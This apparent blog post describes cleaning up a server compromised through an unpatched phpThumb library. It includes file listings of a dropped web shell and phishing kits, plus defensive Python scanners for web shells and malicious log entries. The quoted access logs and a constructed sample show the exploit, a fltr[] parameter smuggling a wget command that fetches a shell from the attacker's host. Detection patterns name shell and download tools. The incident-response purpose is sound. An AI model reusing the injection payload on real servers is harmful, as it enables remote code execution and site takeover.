Security Compromised by phpThumb Vulnerability – Solved

Today, I got an urgent message about a website which had actually been hacked through an open-source PHP image-manipulation library, ‘phpThumb’. phpThumb had published a security update at the end of last year (August 2011), but it had not been applied on the server.

Vulnerability is mentioned here …

http://secunia.com/advisories/39556

http://forum.intern0t.org/exploits-vulnerabilities-pocs/2969-phpthumb-all-versions-arbitrary-command-execution.html

The hacker's footprint was …

I fetched all files changed in the last 2 days by going to public_html and running:

# find ./ -type f -ctime -2 -exec ls -lcr {} \; > ../last-activity.txt

Interesting results … the web shell, Perl and PHP files …

-rw-r--r-- 1 user user 24911 May 15 08:08 ./phpthumb/filess.php
-rw-r--r-- 1 user user 4549 May 15 08:10 ./phpthumb/cp.txt
-rw-r--r-- 1 user user 1076 May 15 08:13 ./phpthumb/confspy.log
-rw-r--r-- 1 user user 24911 May 15 08:08 ./phpthumb/filess.php.1
-rw-r--r-- 1 user user 194113 May 15 10:09 ./config.php

and the phishing pages …

-rw-r--r-- 1 user user 28469 May 15 11:36 ./webmail.uncfsu.edu.zip
-rw-r--r-- 1 user user 3669 May 15 11:37 ./webmail.uncfsu.edu/login_files/flogon.js
-rw-r--r-- 1 user user 1144 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgnexlogo.gif
-rw-r--r-- 1 user user 2512 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgntopr.gif
-rw-r--r-- 1 user user 3461 May 15 11:37 ./webmail.uncfsu.edu/login_files/owafont.css
-rw-r--r-- 1 user user 2310 May 15 11:37 ./webmail.uncfsu.edu/login_files/logon.css

…………………

-rw-r--r-- 1 user user 222219 May 15 15:08 ./chaseupdating.zip
-rw-r--r-- 1 user user 1245 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK.php
-rw-r--r-- 1 user user 5692 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/Logon.php
-rw-r--r-- 1 user user 316 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/index.php
-rw-r--r-- 1 user user 29742 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/details.php
-rw-r--r-- 1 user user 323 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/default_bg.gif
-rw-r--r-- 1 user user 1556 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/search_button_home.gif
-rw-r--r-- 1 user user 121 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/curvebg_darkblue_right.gif
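As an added example (not part of the original post), here is a Python equivalent of the `find -ctime` sweep above that also inspects each recently changed PHP file for the constructs typical of a dropped web shell, which is the check step 2 of the solution below asks for. The indicator patterns, the backup-suffix rule (files like filess.php.1) and the command-line usage are this example's own assumptions, not anything shipped by phpThumb.

```python
"""Triage recently changed files under a web root and flag likely PHP web shells.

Added example, not from the original post. Mirrors the author's
`find ./ -type f -ctime -2` sweep and adds a content check for the kind of
backdoor that was found in ./phpthumb/filess.php. Patterns are constructed.
"""
import os
import re
import time
from typing import List, Tuple

# Constructs that are rare in legitimate image-library code but common in
# PHP backdoors: code execution driven by request input or obfuscated blobs.
SHELL_PATTERNS = [
    ("exec of request input",
     re.compile(rb"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$(_GET|_POST|_REQUEST|_COOKIE)\b")),
    ("eval of decoded blob",
     re.compile(rb"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(")),
    ("preg_replace with /e modifier",
     re.compile(rb"\bpreg_replace\s*\(\s*['\"][^'\"]*[a-z]*e[a-z]*['\"]\s*,")),
    ("variable function from request input",
     re.compile(rb"\$(_GET|_POST|_REQUEST)\s*\[[^\]]+\]\s*\(\s*\$")),
]
# A second download of the same shell leaves copies like filess.php.1; the web
# server will not execute them, but they are evidence and must not be missed.
ODD_SUFFIX = re.compile(r"\.php(\.\d+|\.bak|\.old)$", re.IGNORECASE)


def recently_changed(root: str, since: float) -> List[str]:
    """Return files whose inode change time (ctime) is at or after `since`.

    ctime is used on purpose, as in the author's find command: mtime can be
    backdated with touch(1), but ctime is set by the kernel and cannot be
    chosen by the attacker, so a ctime sweep is the trustworthy one.
    """
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if st.st_ctime >= since:
                hits.append(path)
    return sorted(hits)


def shell_indicators(path: str, max_bytes: int = 1_000_000) -> List[str]:
    """Return the reasons `path` looks like a dropped web shell (empty if clean)."""
    reasons = []
    if ODD_SUFFIX.search(path):
        reasons.append("PHP source with backup-style suffix")
    if path.lower().endswith(".php") or ODD_SUFFIX.search(path):
        try:
            with open(path, "rb") as fh:
                data = fh.read(max_bytes)
        except OSError:
            return reasons
        for label, pattern in SHELL_PATTERNS:
            if pattern.search(data):
                reasons.append("matches " + label)
    return reasons


def triage(root: str, days: float = 2.0) -> List[Tuple[str, List[str]]]:
    """Every file changed in the last `days`, paired with its shell indicators."""
    since = time.time() - days * 86400
    return [(p, shell_indicators(p)) for p in recently_changed(root, since)]


if __name__ == "__main__":
    import sys
    web_root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, reasons in triage(web_root):
        flag = "SUSPECT" if reasons else "changed"
        detail = f"  ({'; '.join(reasons)})" if reasons else ""
        print(f"{flag:8} {path}{detail}")
```

Run it as `python triage.py /home/user/public_html` and review every line marked SUSPECT first; the plain "changed" lines still deserve a look, since phishing kits are mostly HTML, CSS and images that no pattern will catch.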

Checking the access logs revealed the exact details of the intruder's actions …

41.138.185.64 - - [15/May/2012:08:08:51 -0600] "GET /vendors/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://41.138.185.64/filess.php;%20&phpThumbDebug=9 HTTP/1.1" 200 48077 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62"
41.138.185.64 - - [15/May/2012:08:08:58 -0600] "GET /vendors/phpthumb/filess.php HTTP/1.1" 200 471 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62"
41.138.185.64 - - [15/May/2012:10:09:26 -0600] "GET /config.php HTTP/1.1" 302 378 "-" "Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62"

Looking dangerous?

…………………
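As an added example (not part of the original post), a small Python scanner for Apache combined-format access logs that flags the fltr[] injection pattern visible above and then tags every later request from the same address, which is how the follow-up fetches of filess.php and config.php surface next to the exploit line. The log lines embedded in it are constructed to mirror the requests above using documentation addresses instead of the real one, and the metacharacter and tool-name list is this example's own choice.

```python
"""Flag phpThumb fltr[] command-injection attempts in Apache combined-format logs.

Added example, not part of the original post. SAMPLE_LOG is constructed to
mirror the attacker's requests from the post (documentation IPs in place of
the real one); the parsing and scoring logic is this example's own.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Unpatched phpThumb hands the text after the "|" in fltr[] to ImageMagick
# through a shell. A legitimate filter argument is a number or a short word
# ("blur|3"), so shell metacharacters, command substitution or the name of a
# download/interpreter tool in that position is a strong sign of exploitation.
SHELL_META = re.compile(
    r"[;&`<>\n]|\$\(|\b(wget|curl|fetch|lwp-download|nc|perl|python|bash|sh)\b",
    re.IGNORECASE,
)

# Constructed sample: one exploit request, two follow-ups from the same
# address, and two benign requests (one of them a normal phpThumb call).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/May/2012:08:08:51 -0600] "GET /vendors/phpthumb/phpThumb.php'
    '?src=file.jpg&fltr[]=blur|9%20-quality%2075%20;wget%20http://203.0.113.5/filess.php;%20'
    '&phpThumbDebug=9 HTTP/1.1" 200 48077 "-" "Opera/9.80 (Windows NT 6.1)"',
    '198.51.100.7 - - [15/May/2012:08:08:55 -0600] "GET /vendors/phpthumb/phpThumb.php'
    '?src=file.jpg&w=200&fltr[]=blur|3 HTTP/1.1" 200 9123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/May/2012:08:08:58 -0600] "GET /vendors/phpthumb/filess.php HTTP/1.1"'
    ' 200 471 "-" "Opera/9.80 (Windows NT 6.1)"',
    '198.51.100.7 - - [15/May/2012:09:00:00 -0600] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/May/2012:10:09:26 -0600] "GET /config.php HTTP/1.1" 302 378 "-" "Opera/9.80 (Windows NT 6.1)"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def query_params(query: str) -> Dict[str, List[str]]:
    """Split a query string on '&' only (as PHP does) and percent-decode exactly once."""
    params: Dict[str, List[str]] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _sep, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def flag_phpthumb(entry: Dict[str, str]) -> List[str]:
    """Reasons this request looks like phpThumb exploitation (empty list if none)."""
    path, _sep, query = entry["target"].partition("?")
    if not path.lower().endswith("phpthumb.php"):
        return []
    params = query_params(query)
    reasons = []
    for value in params.get("fltr[]", []):
        _name, _sep, argument = value.partition("|")
        if SHELL_META.search(argument):
            reasons.append(f"shell metacharacters or tool name in fltr[] argument: {argument!r}")
    if params.get("phpThumbDebug"):
        reasons.append("phpThumbDebug requested (debug output, unusual for real visitors)")
    return reasons


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Findings for exploitation attempts plus every later request from the same IP."""
    findings: List[Dict[str, object]] = []
    attackers = set()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = flag_phpthumb(entry)
        if reasons:
            attackers.add(entry["ip"])
        elif entry["ip"] in attackers:
            reasons = ["follow-up request from an IP that attacked phpThumb"]
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "target": entry["target"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    import sys
    lines = SAMPLE_LOG
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = [ln.rstrip("\n") for ln in fh]
    for f in scan(lines):
        print(f"{f['ip']} {f['ts']} {f['target']}")
        for reason in f["reasons"]:
            print("    " + reason)
```

Run it with the path to access_log to scan a real file, or with no argument to see the constructed sample; the follow-up tagging is what turns a single exploit hit into the list of files the intruder fetched afterwards, which is exactly the set you need to check for shells.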

Solution:

1.) Remove the infection from the files

2.) Ensure there are no PHP shells left behind

3.) Upgrade the software, and keep it upgraded.

http://www.webhostingtalk.com/showthread.php?t=972669

A must-do is to keep an eye on http://secunia.com/advisories for the vulnerabilities that get disclosed from time to time.

I would suggest making a Google Docs sheet to track all such cases, e.g.

3rd-party library | installed version | released version | last check date

Share your thoughts & feedback
